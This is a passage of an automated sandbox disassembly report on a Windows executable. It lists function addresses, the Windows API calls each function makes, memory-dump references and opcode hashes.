                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 0045F1B9
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045F218
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045F27A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3705125965-3916222277
                                                                                                                • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                • Opcode ID: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                                • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                • Opcode Fuzzy Hash: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                                • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                Function 0044BBC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$FullMoveNameOperationPathlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1148786053-1173974218
                                                                                                                • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                Function 004609BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                • GetFocus.USER32 ref: 004609EF
                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 3342072951-1110647743
                                                                                                                • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 1515696956-2761332787
                                                                                                                • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                • DrawMenuBar.USER32 ref: 00449828
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                • Opcode ID: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                • Opcode Fuzzy Hash: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                Function 00416AD5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(00000017,00416FB1), ref: 00416B00
                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,00416FB1), ref: 004182F3
                                                                                                                • DeleteCriticalSection.KERNEL32(00000017,KERNEL32.DLL,?,00416FB1), ref: 0041831D
                                                                                                                  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                                                                  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000005,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalDeleteSectionValue$Free
                                                                                                                • String ID: KERNEL32.DLL
                                                                                                                • API String ID: 3936257031-2576044830
                                                                                                                • Opcode ID: 4edcc429f782e47b3d6ca153a441a70e2b111d037376c7f0eede9fe860c843eb
                                                                                                                • Instruction ID: f80bf491939f1815d6b95db29b547c1add7b203e7a040b93f80d5043d0177117
                                                                                                                • Opcode Fuzzy Hash: 4edcc429f782e47b3d6ca153a441a70e2b111d037376c7f0eede9fe860c843eb
                                                                                                                • Instruction Fuzzy Hash: 530140329006109FCA345B689D8589A77A8AF61735325477FE8B8E32E0CF3D9C81C65D
                                                                                                                Function 0040F3B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
